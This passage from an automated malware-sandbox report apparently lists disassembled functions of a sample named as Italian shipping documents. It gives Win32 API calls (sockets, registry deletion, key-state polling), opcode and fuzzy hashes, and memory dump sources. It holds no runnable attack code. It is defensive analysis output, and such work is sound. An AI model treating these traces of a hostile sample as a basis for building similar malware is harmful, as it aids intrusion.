                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                        APIs
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                        • _wcslen.LIBCMT ref: 0045F94A
                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                        Strings
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                        • String ID: 0
                        • API String ID: 621800784-4108050209
                        • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                        • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SetErrorMode.KERNEL32 ref: 004781CE
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • SetErrorMode.KERNEL32(?), ref: 00478270
                        • SetErrorMode.KERNEL32(?), ref: 00478340
                        Strings
                        Similarity
                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                        • String ID: \VH
                        • API String ID: 3884216118-234962358
                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                        • IsMenu.USER32(?), ref: 0044854D
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                        • DrawMenuBar.USER32 ref: 004485AF
                        Strings
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert
                        • String ID: 0
                        • API String ID: 3076010158-4108050209
                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        Strings
                        Similarity
                        • API ID: MessageSend$_memmove_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 1589278365-1403004172
                        • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                        • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                        APIs
                        Strings
                        Similarity
                        • API ID: Handle
                        • String ID: nul
                        • API String ID: 2519475695-2873401336
                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                        Strings
                        Similarity
                        • API ID: Handle
                        • String ID: nul
                        • API String ID: 2519475695-2873401336
                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                        Strings
                        Similarity
                        • API ID:
                        • String ID: SysAnimate32
                        • API String ID: 0-1011021900
                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                        • GetFocus.USER32 ref: 0046157B
                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                        • __swprintf.LIBCMT ref: 00461608
                        Strings
                        Similarity
                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                        • String ID: %s%d
                        • API String ID: 2645982514-1110647743
                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                        APIs
                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        • String ID:
                        • API String ID: 3488606520-0
                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                        Similarity
                        • API ID: ConnectRegistry_memmove_wcslen
                        • String ID:
                        • API String ID: 15295421-0
                        • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                        • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                        • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                        • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                        APIs
                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                        Similarity
                        • API ID: AddressProc$Library$FreeLoad
                        • String ID:
                        • API String ID: 2449869053-0
                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                        APIs
                        • GetCursorPos.USER32(?), ref: 004563A6
                        • ScreenToClient.USER32(?,?), ref: 004563C3
                        • GetAsyncKeyState.USER32(?), ref: 00456400
                        • GetAsyncKeyState.USER32(?), ref: 00456410
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                        Similarity
                        • API ID: AsyncState$ClientCursorLongScreenWindow
                        • String ID:
                        • API String ID: 3539004672-0
                        • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                        • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                        • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                        • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                        APIs
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                        Similarity
                        • API ID: Interlocked$DecrementIncrement$Sleep
                        • String ID:
                        • API String ID: 327565842-0
                        • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                        • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                        • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                        • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        • String ID:
                        • API String ID: 2832842796-0
                        • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                        • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                        • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                        • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                        Similarity
                        • API ID: Enum$CloseDeleteOpen
                        • String ID:
                        • API String ID: 2095303065-0
                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00436A24
                        Similarity
                        • API ID: RectWindow
                        • String ID:
                        • API String ID: 861336768-0
                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                        APIs
                        • SendMessageW.USER32 ref: 00449598
                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                        • _wcslen.LIBCMT ref: 0044960D
                        • _wcslen.LIBCMT ref: 0044961A
                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                        Similarity
                        • API ID: MessageSend$_wcslen$_wcspbrk
                        • String ID:
                        • API String ID: 1856069659-0
                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                        APIs
                        • GetCursorPos.USER32(?), ref: 004478E2
                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                        • GetCursorPos.USER32(00000000), ref: 0044796A
                        • TrackPopupMenuEx.USER32(02EE64C0,00000000,00000000,?,?,00000000), ref: 00447991
                        Similarity
                        • API ID: CursorMenuPopupTrack$Proc
                        • String ID:
                        • API String ID: 1300944170-0
                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                        APIs
                        • GetClientRect.USER32(?,?), ref: 004479CC
                        • GetCursorPos.USER32(?), ref: 004479D7
                        • ScreenToClient.USER32(?,?), ref: 004479F3
                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Client$CursorFromPointProcRectScreenWindow
                        • String ID:
                        • API String ID: 1822080540-0
                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                        • EndPaint.USER32(?,?), ref: 00447D13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 659298297-0
                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                        APIs
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                          • Part of subcall function 00440D98: SendMessageW.USER32(02EE1B88,000000F1,00000000,00000000), ref: 00440E6E
                          • Part of subcall function 00440D98: SendMessageW.USER32(02EE1B88,000000F1,00000001,00000000), ref: 00440E9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Window$EnableMessageSend$LongShow
                        • String ID:
                        • API String ID: 142311417-0
                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00445879
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                        • _wcslen.LIBCMT ref: 004458FB
                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                        • String ID:
                        • API String ID: 3087257052-0
                        • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                        • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                        APIs
                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 245547762-0
                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 004471D8
                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • SelectObject.GDI32(?,00000000), ref: 00447228
                        • BeginPath.GDI32(?), ref: 0044723D
                        • SelectObject.GDI32(?,00000000), ref: 00447266
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Object$Select$BeginCreateDeletePath
                        • String ID:
                        • API String ID: 2338827641-0
                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00434598
                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                        • Sleep.KERNEL32(00000000), ref: 004345D4
                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                        • MessageBeep.USER32(00000000), ref: 00460C46
                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                        • EndDialog.USER32(?,00000001), ref: 00460C83
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$Icon
                        • String ID:
                        • API String ID: 4023252218-0
                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                        APIs
                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                        • String ID:
                        • API String ID: 1489400265-0
                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                        APIs
                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                        • DestroyWindow.USER32(?), ref: 00455728
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                        • String ID:
